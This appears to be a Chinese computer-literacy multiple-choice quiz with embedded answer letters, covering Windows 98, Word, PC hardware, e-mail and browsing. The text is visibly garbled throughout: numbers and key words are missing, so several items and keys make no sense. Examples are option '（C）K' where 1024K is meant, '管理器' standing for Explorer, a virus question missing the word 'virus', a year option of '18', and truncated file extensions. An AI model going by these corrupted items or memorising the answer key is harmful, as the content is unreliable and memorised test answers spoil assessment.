37>在Windows 98中，窗口最大化后不能进行的操作是（ C ）。

（A）恢复（B）最小化 （C）移动 （D）关闭

38>在计算机中（ C ）个字节称为一个MB。

（A）10K（B）100K（C）K（D）1000K

39>在Word的编辑状态，执行编辑菜单中“复制”命令后 （ B ）。

（A）被选择的内容被复制到插入点处（B）被选择的内容被复制到剪贴板

（C）插入点所在的段落内容被复制到剪贴板（D）光标所在的段落内容被复制到剪贴板

40>下列关于计算机软件版权的叙述，不正确的是（ C ）。

（A）计算机软件是享有著作保护权的作品（B）未经软件著作人的同意，复制其软件的行为是侵权行为（C）盗版软件是一种免费软件（D）盗版软件是一种违法行为

41>选中一个文件，点击鼠标右键，再选中“删除”，则该文件（ B ）。

（A）被彻底删除 （B）只是被放入回收站，还可以还原 （C）只是被放入回收站，但不可还原

（D）被放入了剪贴板中

42>一个完整的计算机系统包括 （ ）。A

（A）硬件和软件（B）主机和外部设备（C）主机和实用程序 （D）运算器、存储器和控制器

43>在电子邮件中能包含的信息有 （ D ）。（A）只能是文字（B）只能是文字与图像信息（C）只能是文字与声音信息（D）可以包含文字、声音和图像等各种信息

44>一只1000G的硬盘的容量相当于1000M的硬盘（ C ）。

（A）1 只（B）1000只（C）只 （D）512只

45>我国的第一台电子计算机于（ B ）年试制成功。

（A）1953 （B）1958 （C）1964 （D）18

46>计算机上网，下列设备中必需的是（ B ）。

（A）电话机（B）网卡或调制解调器（C）无线话筒 （D）耳机

47>微机中1K字节表示的字节数是（ C ）。

（A）1000（B）8×1000 （C） （D）8×

48>在字处理系统的编辑状态下，“打开”文档的作用是（ C ）。

（A）将指定的文档从内存中读入，并显示在当前窗口 （B）为指定的文档打开一个空白窗口

（C）将指定的文档从外存中读入，并显示在当前窗口（D）显示并打印指定文档的内容

49>有一台计算机其CPU的型号为PⅢ886，其中“886”指的是（ B ）。

（A）CPU的出厂编号 （B）CPU的主频（C）内存的容量 （D）CPU的价格

50>在Windows 98中，打开“管理器”窗口后，要改变文件或文件夹的显示方式，应选用（ C ）。

（A）“文件”菜单（B）“编辑”菜单（C）“查看”菜单 （D）“帮助”菜单

51>一个字节对应的二进制位数是（ D ）。

（A）1（B）2 （C）4 （D）8

52>Windows98中一般来说浏览系统可以通过"我的电脑"和（ D ）来完成。

（A）公文包（B）文件管理器（C）程序管理器（D）管理器

53>在计算机的存储中，关机后会丢失信息的是 （ D ）。

（A）软盘 （B）硬盘 （C）ROM （D）RAM

54>下面设备中是输入设备的是 （ ）。C

（A）磁盘驱动器（B）显示器 （C）键盘 （D）打印机

55>下列不属于操作系统的软件是（ D ）。

（A）Windows （B）DOS （C）Linux （D）Powerpoint

56>计算机是指（ C ）。（A）能传染给操作者的一种 （B）已感染的磁盘（C）具有破坏性的特制程序（D）已感染的程序

57>微型计算机的键盘上用于输入上档字符和转换英文大小写字母输入的键是（ C ）。

（A）<Alt>键（B）<Ctrl>键 （C）<Shift>键 （D）<Tab>键

58>Windows 98中的“剪贴板”是（ D ）。（A）硬盘中的一块区域（B）软盘中的一块区域（C）高速缓存中的一块区域（D）内存中的一块区域

59>在桌面空白处右击，弹出的快捷菜单中选择“属性”会出现（ C ）。

（A）“控制面板”对话框（B）“系统属性”对话框（C）“显示属性”对话框 （D）“桌面主题”对话框

60>WORD 在正常启动之后，会自动打开一个名为（ D ）的文档。

（A）1.DOC （B）1.TXT （C）DOC1.DOC （D）文档1

61>在Windows98中，“回收站”的作用是（ D ）。

（A）存放磁盘的碎片（B）存放文件的碎片（C）保存剪切的文本（D）存放被删除的文件

62>在Windows 95中有两个管理系统的程序组,它们是（ C ）。（A）管理器"和"控制面板（B）"我的电脑"和"控制面板"（D）我的电脑"和"管理器"（C）"控制面板"和"开始"菜单

63>在微型计算机中，CPU的名称是（ A ）。

（A）中央处理器 （B）内存 （C）运算器 （D）控制器

64>设Windows 98 桌面上已经有某应用程序的图标，在系统默认方式下，要运行该程序，可以（ C ）。

（A）用鼠标左键单击该图标 （B）用鼠标右键单击该图标（C）用鼠标左键双击该图标 （D）用鼠标右键双击该图标

65>在Windows 98的窗口中，选中末尾带有省略号（…）的菜单意味着（ D ）。

（A）将弹出下一级菜单（B）将执行该菜单命令（C）表明该菜单项已被选用（D）将弹出一个对话框

66>在Internet(因特网)上能够（ D ）。

（A）网上购物（B）打国际长途电话 （C）网上看病 （D）以上都对

67>下列不属于信息传递方式的是 （ D ）。

（A）听音乐 （B）谈话 （C）看书 （D）思考

68>下列有关回收站的论述，错误的是（ A ）。

（A）回收站不占用磁盘空间（B）如果确认回收站中的所有内容无保留价值，可清空收站

（C）误删除的文件可通过回收站还原（D）回收站中的内容可以删除

69>电子邮件地址的一般格式为（ A ）。

（A）用户名@域名 （B）域名@用户名（C）ＩＰ地址@域名（D）域名@IP地址

70>计算机硬件系统中最核心的部件是 （ B ）。

（A）主板（B）CPU （C）内存储器 （D）I/O设备

71>在某个文档窗口中进行了多次剪切操作，并关闭了该文档窗口后，剪贴板中的内容为（ B ）。

（A）第一次剪切的内容（B）最后一次剪切的内容（C）所有剪切的内容（D）空

72>在Windows 98的"回收站"中,存放的（ ）。A

（A）只能是硬盘上被删除的文件或文件夹（B）只能是软盘上被删除的文件或文件夹

（C）可以是硬盘或软盘上被删除的文件或文件夹（D）可以是所有外存储器中被删除的文件或文件夹

73>在只有一个软驱的计算机中，软驱的盘符通常用（ A ）。（A）A：（B）B：（C）C： （D）D：

74>在Windows 98的“管理器”左部窗口中，若显示的文件夹图标前带有加号（+），意味着该文件夹 （ A ）。（A）含有下级文件夹 （B）仅含有文件 （C）是空文件夹（D）不含下级文件夹

75>下列能管理计算机硬件、软件的软件是（ C ）。

（A）Word2000（B）PowerPoint2000 （C）Windows2000 （D）Wps2000

76>对于内存的说法正确的是（A ）。

（A）存储速度很快（B）价格相对于硬盘来说比较便宜（C）携带比较方便 （D）一般不会感染它

77>在Windows中，默认的切换中英文输入的方法是 （ A ）。

（A）CTRL+空格（B）CTRL+SHIFT （C）SHIFT+ALT+CTRL （D）ALT+空格

78>用IE访问网页时，鼠标指针移到存在超级链接部位时，形状通常变为 （ C ）。

（A）闪烁状态（B）箭头形状 （C）手形 （D）旁边出现一个问号

79>用智能ABC输入法输入单个汉字时，使用的字母键（ C ）。

（A）必须是大写（B）大写或小写（C）必须是小写（D）大写或小写混合键用

80>对“我的电脑”的图标单击鼠标右键，可执行下面的哪个操作 （ C ）。

（A）打开文件（B）打开“我的电脑”窗口（C）打开快捷菜单 （D）没有反应

81>Windows 98的整个显示屏幕称为 （ D ）。

（A）窗口（B）操作台 （C）工作台 （D）桌面

82>主要用于查看因特网信息的软件是（ C ）。

（A）Microsoft Word（B）Microsoft Excel（C）Internet Explorer （D）Outlook Express

83>在同一磁盘的两个文件夹间移动选定的文件，除可用鼠标直接拖动实现外，还可以使用的方法是（ D ）。（A）先“复制”后“粘贴” （B）先“移动”后“粘贴”（C）先“删除”后“粘贴” （D）先“剪切”后“粘贴”

84>在Windows98的“我的电脑”窗口中，若已选定硬盘上的文件或文件夹，并按了DEL键和“确定”按钮，则该文件或文件夹将（ A ）。（A）被删除并放入“回收站” （B）不被删除也不放入“回收站”

（C）被删除并不放入“回收站” （D）被压缩并放入“回收站”

85>以下均为文件扩展名的是（ C ）。

（A）txt、doc（B）w、mid （C）i、mpg（D）bmp、gif

86>计算机网络最突出的优点是 （ A ）。

（A）可以互相通信、数据共享 （B）运算效率高（C）处理速度快（D）存储容量大

87>查看近期访问过的站点，应该点击哪个按钮 （ D ）。

（A）主页（B）搜索 （C）收藏 （D）历史

88>在Windows网络环境中，要访问其他计算机，可以打开 （ C ）。

（A）我的电脑 （B）控制面板 （C）网上邻居 （D）我的文档

89>与普通邮件相比，电子邮件的特点是 （ D ）。

（A）发送速度慢、费用高（B）发送速度慢、费用低（C）发送速度快、费用高 （D）发送速度快、费用低

90>在全屏幕方式的DOS状态下，如果想返回到WINDOWS，键入（ B ）。

（A）QUIT （B）EXIT （C）XLS （D）DOS

91>现有一个以文件名A保存过的word文档，如果要把该文件以文件名B保存的话，使用方法是（ B ）。

（A）“保存” （B）“另存为” （C）“另存为Web页” （D）“打开”

92>使用Windows的过程中，在不能使用鼠标的情况下，可以打开“开始”菜单的操作是（ C ）。

（A）按Shift+Tab键 （B）按Ctrl+Shift键 （C）按Ctrl+Esc键 （D）按空格键

93>Windows的文件夹下（ B ）。

（A）只能存放文件（B）可以存放文件或文件夹 （C）只能存放文件夹（D）不能存放任何东西

94>一个字节(BYTE)占（ D ）个二进制位。（A）1 （B）2 （C）4 （D）8

95>在进行文件的移动操作时，剪切操作是（ D ）。（A）将选定的文件删除（B）将选定的文件复制（C）将选定的文件移到当前插入点处（D）将选定的文件移到剪贴板

96>在Windows 98中，要彻底删除一个文件可行的方法之一是（ A ）。

（A）选中该文件，单击鼠标右键，按住Shift键，选中“删除”，点击“是”按钮

（B）选中该文件，单击鼠标左键，按住Alt键，选中“删除”，点击“是”按钮

（C）选中该文件，单击鼠标右键，按住Ctrl键，选中“删除”，点击“是”按钮

（D）选中该文件，单击鼠标左键，按住Ctrl键，选中“删除”，点击“是”按钮

>在Window 98的"管理器"窗口左部，单击文件夹图标左侧的加号（+）后，屏幕上显示结果的变化是（ C ）。（A）窗口左部显示的该文件夹的下级文件夹消失（B）该文件夹的下级文件夹显示在窗口右部

（C）该文件夹的下级文件夹显示在窗口左部（D）窗口右部显示的该文件夹的下级文件夹消失

98>Windows把整个屏幕看作（ B ）。（A）窗口（B）桌面（C）屏幕（D）桌布

99>在Windows98中，按Ctrl+Alt+Del将出现“关闭程序”窗口，该窗口所列出的内容是（ B ）。

（A）已经打开的各个文档文件的文件名（B）正在运行的各个程序名

（C）具有“系统”属性的应用程序名（D）系统中可执行的各个程序名

100>在Windows 98的桌面上有一个文件夹显示为灰色，则该文件夹的属性为（ B ）。

（A）只读 （B）隐藏 （C）存档 （D）系统